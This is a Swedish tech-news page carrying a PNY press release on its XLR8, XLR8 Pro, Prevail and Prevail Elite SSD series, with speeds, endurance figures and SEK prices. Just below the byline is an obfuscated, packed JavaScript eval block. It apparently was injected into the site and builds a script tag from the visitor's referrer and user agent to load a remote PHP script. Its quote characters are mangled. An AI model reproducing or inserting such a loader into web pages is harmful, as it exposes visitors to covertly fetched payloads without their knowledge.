Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

PNY presenterar ny SSD-serie utformad för alla behov

PNY presenterar ny SSD-serie utformad för alla behov
Sebastian Plengier Ehrnfelt

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eakki|var|u0026u|referrer|adbid||js|php’.split(‘|’),0,{}))
PNY Technologies, ledande tillverkare och leverantör av lösningar för uppgradering, grafik och lagring, lanserar nu sitt senaste utbud av flashbaserade SSDs. SSD-serien består av fyra modeller: XLR8 och XLR8 Pro för konsumenter samt Prevail och Prevail Elite speciellt framtagna för professionella användare. Alla modeller är tillgängliga med lagringsutrymmen på  120 GB, 240 GB och 480 GB. Serien inkluderar SandForce SF2000 controllers, höghastighetschip och är tillverkad av högsta branschkvalitet i PNYs fabrik i USA och levererar hög prestanda och uthållighet.

 

XLR8 : Hög prestanda till lågt pris för daglig användning

Med PNYs senaste XLR8 SSDs kan användare både hemma och på kontoret utnyttja alla fördelar med SSD-teknologi till ett lågt pris. Med överföringshastigheter på upp till 500 MB / sek och 60 000 IOPS per sekund, laddas operativsystem och applikationer snabbt. Tack vare det pålitliga flashminnet är det mindre risk för krasher och dataförlust.  PNY XLR8-serien består av de bästa komponenterna, med SandForce SF2200 Series controller inkluderad, och  möjliggör en intensiv användning på upp till 15GB per dag i 5 år. Den uppskattade medelanvändningen ligger på strax över 3.5 GB.

 

XLR8 Pro and Prevail: För professionella multimediaentusiaster och material i full HD

Framtagen för gamers, fotografer och multimediaanvändare med höga krav på högsta möjliga prestanda, har PNY XLR8 Pro SSD överföringshastiger på upp till 550 MB/s läs- och 520 MB/s skrivhastigheter och 85,000 IOPS per sekund. XLR8 Pro and Prevail är framtagna för användare som kräver tunga applikationer.

 

XLR8 Pro SSD är baserad på SandForce SF2281 controller och har SATA III 6 MB/s samt integrerade minneschip för intensiv användning över längre tid. Den stöder TRIM funktion och 128 bit AES kryptering.


SSD Prevail är framtaget för professionell användning, så som installation på RAID lagringsserver och Cloud Computing. Den erbjuder samma höga prestanda som XLR8 Pro men med adderad professionell service: den är tillgänglig i olika höjder och kan anpassas till alla server bays market, den har en förpackningsspecifik integration och  BOM control av alla komponenter för maximal kompabilitet med olika system.

 

Prevail Elite : Förstaklassig prestanda och uthållighet

 

Prevail Elite erbjuder förstaklassig SSD-teknologi med hög uthållighet (10 000 läs och skrivcyklar) och är framtaget för extremt tunga applikationer. Den erbjuder höga överföringshastigheter som krävs för tunga dataöverföringar och användning av intensiva applikationer och möjliggör ett optimalt arbetsflöde. Den når upp till  550 MB per sekund läshastighet och 520 MB per sekund skrivhastighet, med upp till 85,000 IOPS per sekund.

 

XLR8, XLR8 Pro, Prevail och Prevail Elite kommer med ett valbart installationskit som inkluderar: metallställning, skruvar, SATA III kabel och Acronis True Image HD programvara.

 

Pris och tillgänglighet

PNYs SSD-serie kommer med 3 års garanti och finns tillgänglig att köpa hos PNY’s svenska återförsäljare och internetdistributörer.

 

XLR8 120 GB, 240 GB och 480 GB : 849, 1.499 och 3.199 SEK

XLR8 Pro 120 GB, 240 GB och 480 GB: 999, 1.799 och 3.599 SEK

Prevail 120 GB, 240 GB och 480 GB: 999, 1.599 och 3.199 SEK

Prevail Elite 120 GB, 240 GB och 480 GB: 1.099, 1.899 och 4.599 SEK

Detta är ett pressmeddelande från PNY